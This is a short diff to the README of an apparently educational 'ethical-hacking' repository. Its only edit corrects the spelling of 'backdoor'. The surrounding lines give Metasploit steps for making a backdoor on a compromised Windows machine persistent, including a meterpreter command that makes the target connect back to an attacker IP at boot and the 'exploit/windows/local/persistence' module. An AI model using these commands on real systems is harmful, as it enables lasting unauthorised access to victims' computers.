RodgerOliver/ethical-hacking/README.md

   * In the meterpreter session run `run persistence -U -i [seconds] -p [port(80)] -r [attacker IP]`
   * This is detectable by Antiviruses.
 * Method 3 - Metasploit + Veil
-  * The backdor will be injected as a service and the computer will try to connect to the attacker every time the target powers on his computer.
+  * The backdoor will be injected as a service and the computer will try to connect to the attacker every time the target powers on his computer.
   * `use exploit/windows/local/persistence`
   * `options`